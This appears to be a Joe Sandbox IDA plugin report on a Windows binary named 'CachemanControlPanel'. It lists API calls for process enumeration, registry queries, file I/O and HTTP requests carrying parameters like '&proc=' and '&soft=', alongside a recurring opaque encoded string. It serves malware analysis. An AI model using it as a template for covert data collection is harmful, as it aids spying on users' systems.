                                                          • Part of subcall function 00418710: TlsGetValue.KERNEL32(00000022,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00404AE3,00000000), ref: 00418727
                                                          • Part of subcall function 00418570: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 00418576
                                                          • Part of subcall function 00418570: TlsGetValue.KERNEL32(00000022), ref: 00418585
                                                          • Part of subcall function 00418570: SetLastError.KERNEL32(?), ref: 0041859B
                                                          • Part of subcall function 00418640: wcslen.MSVCRT ref: 00418657
                                                          • Part of subcall function 004039B7: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004039F1
                                                          • Part of subcall function 004039B7: Process32FirstW.KERNEL32(?,?), ref: 00403A0C
                                                          • Part of subcall function 004039B7: Process32NextW.KERNEL32(?,?), ref: 00403A22
                                                          • Part of subcall function 004039B7: GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 00403A3E
                                                          • Part of subcall function 0040A212: TlsGetValue.KERNEL32(00000000,0040111B,0043101C,FFFFFFFF,00000002,00000000,00000000,00000001,00000020,00000000,00000000,0043383C,00000000,00000000,00000000,0000000C), ref: 0040A219
                                                          • Part of subcall function 004169D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00407D6F,00000000,00000000,00000000,00000000), ref: 004169F2
                                                          • Part of subcall function 004169D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00407D6F,00000000,00000000,00000000), ref: 00416A16
                                                          • Part of subcall function 004059BB: GetTickCount.KERNEL32 ref: 004059ED
                                                          • Part of subcall function 004186A0: TlsGetValue.KERNEL32(00000022,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00404B45,00000001,00000001,00000006,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 004186AA
                                                          • Part of subcall function 00408683: InternetOpenW.WININET(00000000,00000001,00430024,00430024,00000000), ref: 004087AB
                                                          • Part of subcall function 00408683: InternetSetOptionW.WININET(00000000,00000002,000003E8,00000004), ref: 004087C7
                                                          • Part of subcall function 0040AA1A: CreateThread.KERNEL32 ref: 0040AA33
                                                          • Part of subcall function 0040AA1A: EnterCriticalSection.KERNEL32(00434190,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,?,00404F65,00000000,00000000,&er=1,00000000,00000000,00000000,&env=,00000000,00000000,00000000), ref: 0040AA45
                                                          • Part of subcall function 0040AA1A: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,?,00404F65,00000000,00000000,&er=1,00000000,00000000,00000000,&env=,00000000), ref: 0040AA5C
                                                          • Part of subcall function 0040AA1A: CloseHandle.KERNEL32(00000008,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,?,00404F65,00000000,00000000,&er=1,00000000,00000000,00000000,&env=,00000000,00000000,00000000), ref: 0040AA68
                                                          • Part of subcall function 0040AA1A: LeaveCriticalSection.KERNEL32(00434190,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,?,00404F65,00000000,00000000,&er=1,00000000,00000000,00000000,&env=,00000000,00000000,00000000), ref: 0040AAAB
                                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,&er=1,00000000,00000000,00000000,&env=,00000000), ref: 00404FAF
                                                          • Part of subcall function 00408683: InternetConnectW.WININET(00000000,00000000,00000000,00430024,00430024,00000003,00000000,00000000), ref: 00408877
                                                          • Part of subcall function 00408683: HttpOpenRequestW.WININET(00000000,00000000,00000000,00000000,00000000,00430024,00430024,00000000), ref: 004088D4
                                                          • Part of subcall function 00408683: HttpAddRequestHeadersW.WININET(?,00000000,00000000,?), ref: 00408936
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Value$Internet$ByteCharCreateCriticalErrorHttpLastMultiOpenProcess32RequestSectionWide$CloseConnectCountCurrentEnterExistsFileFirstHandleHeadersLeaveNextObjectOptionPathProcessSingleSnapshotThreadTickToolhelp32Waitwcslen
                                                        • String ID: &env=$&er=1$&proc=$&ref=$&soft=
                                                        • API String ID: 2836524744-2666957756
                                                        • Opcode ID: 8b9e864f6b8440a422e835446f3ca6957ada43615bbe1f2e44edacd14fbf2a0a
                                                        • Instruction ID: cd10d1e333f84532abc327abded1a4e38b940fbd6fc88dc9f114c5da659bfbdd
                                                        • Opcode Fuzzy Hash: 8b9e864f6b8440a422e835446f3ca6957ada43615bbe1f2e44edacd14fbf2a0a
                                                        • Instruction Fuzzy Hash: F24108BA5003007AE5407BB2AD87EBE36ADDFD4719B50C83FB440B51A2DD3D89D1662E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00402156
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,00020019,?), ref: 00402192
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 004021EE
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,00000000), ref: 0040229F
                                                        • RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,00020019,?), ref: 004022ED
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 004020FB
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: QueryValue$CloseOpen
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 1586453840-3176450862
                                                        • Opcode ID: 6c9580eb88d2f1b345745aa3c4a728e94441160c3cb641defe0415a1676366de
                                                        • Instruction ID: 23c924af39f916994596fa9df9482e0d540c5780d3637c3aa7157ccb99e762e3
                                                        • Opcode Fuzzy Hash: 6c9580eb88d2f1b345745aa3c4a728e94441160c3cb641defe0415a1676366de
                                                        • Instruction Fuzzy Hash: DA517D72108300AED701EF51CD85B6FBBE9EB98318F10883EF184A51E1D679DD959B2B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • HeapAlloc.KERNEL32(00000000,00001000,00430D24,004338DC), ref: 0040D650
                                                        • ReadFile.KERNEL32(?,000007FF,00000002,?,00000000), ref: 0040D6BD
                                                        • HeapReAlloc.KERNEL32(00000008,?,00000000), ref: 0040D714
                                                        • ReadFile.KERNEL32(?,000007FF,00000002,?,00000000), ref: 0040D791
                                                          • Part of subcall function 0040D390: memcpy.MSVCRT ref: 0040D3D7
                                                        • SetFilePointer.KERNEL32(?,000000FE,?,00000001), ref: 0040D7C6
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0040D66D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: File$AllocHeapRead$Pointermemcpy
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 90066635-3176450862
                                                        • Opcode ID: ff82b2b37c71b620f9bd45e4bd4cfe982f1a38d801607e27e665c5271512a94e
                                                        • Instruction ID: b10e450864e0f07a927103a4a7e8d44a32e8943feeaaec03f904f78881a89d72
                                                        • Opcode Fuzzy Hash: ff82b2b37c71b620f9bd45e4bd4cfe982f1a38d801607e27e665c5271512a94e
                                                        • Instruction Fuzzy Hash: 94418D759043029FD724EF58C845B6BB7E4EB84310F404A2EF895A72D1D778888ECB6B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • HeapAlloc.KERNEL32 ref: 0040D4C8
                                                        • ReadFile.KERNEL32(?,?,00000001,?,00000000,00000000,00001000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000), ref: 0040D527
                                                        • HeapReAlloc.KERNEL32(00000008,?,?), ref: 0040D56D
                                                        • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040D5DE
                                                          • Part of subcall function 0040D390: memcpy.MSVCRT ref: 0040D3D7
                                                        • SetFilePointer.KERNEL32(?,000000FF,?,00000001), ref: 0040D611
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0040D4E5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: File$AllocHeapRead$Pointermemcpy
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 90066635-3176450862
                                                        • Opcode ID: 7086492cf1892e17745e9fa85beb9d8f72ef5bfb658d6778648d5717f8417940
                                                        • Instruction ID: 0257778187a983b746f26efc7778f6c5f6cb4b1d6e68d3976ba57411af2562b0
                                                        • Opcode Fuzzy Hash: 7086492cf1892e17745e9fa85beb9d8f72ef5bfb658d6778648d5717f8417940
                                                        • Instruction Fuzzy Hash: 8F41BF74908301AFD714DF58C840B6BBBE4EB88314F54493AF984A62D1D3B9D98DCB6B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • memcpy.MSVCRT ref: 0040D3D7
                                                          • Part of subcall function 0040CA80: WriteFile.KERNEL32(?,00000000,?,?,00000000,?,?,0040D34E,?), ref: 0040CAA7
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0040D425
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: FileWritememcpy
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 4212128793-3176450862
                                                        • Opcode ID: a680476142aadcedf96089f29330afbb44f866e065024c2314c34561267240e0
                                                        • Instruction ID: 604ca519519078a20c106cbc031b6c2955c52e3ed9db635ae069167e3b6451e0
                                                        • Opcode Fuzzy Hash: a680476142aadcedf96089f29330afbb44f866e065024c2314c34561267240e0
                                                        • Instruction Fuzzy Hash: 3B3151766007009FC310DF69E884D5BB7E4EFD4355F04843EF64697651C735A818CB65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • HeapAlloc.KERNEL32(00000000,00002000), ref: 0040B41B
                                                        • HeapReAlloc.KERNEL32(00000008,00000000,00000000), ref: 0040B447
                                                        • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0040B47D
                                                        • HeapAlloc.KERNEL32(00000000,00001000), ref: 0040B4A1
                                                        • HeapReAlloc.KERNEL32(00000008,00000000,00001000), ref: 0040B4CC
                                                        • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040B4FC
                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 0040B527
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Heap$Alloc$FileRead$Free
                                                        • String ID:
                                                        • API String ID: 313634878-0
                                                        • Opcode ID: 49a273a2fbc72ee78493fe5fc313325230be89da784bccd384b040df613edda4
                                                        • Instruction ID: d74077c3dccb0411af24ea0c992bd4fba55b85ec084ea6112605becf6dbda7eb
                                                        • Opcode Fuzzy Hash: 49a273a2fbc72ee78493fe5fc313325230be89da784bccd384b040df613edda4
                                                        • Instruction Fuzzy Hash: 2731F630104301BAE721AF14DD45B677BE8EF88396F44093AF981E12A2D3799D45C7EE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CharLowerW.USER32(://,00000000,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,?,00000001,00000020,00000000,00000000,?,00000000), ref: 00417586
                                                        • CharLowerW.USER32(00000000,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,?,00000001,00000020,00000000,00000000,?,00000000), ref: 004175C0
                                                        • CharLowerW.USER32(?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,?,00000001,00000020,00000000,00000000,?,00000000), ref: 004175EF
                                                        • CharLowerW.USER32(?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,?,00000001,00000020,00000000,00000000,?,00000000), ref: 004175F5
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 00417564
                                                        • ://, xrefs: 00417585
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
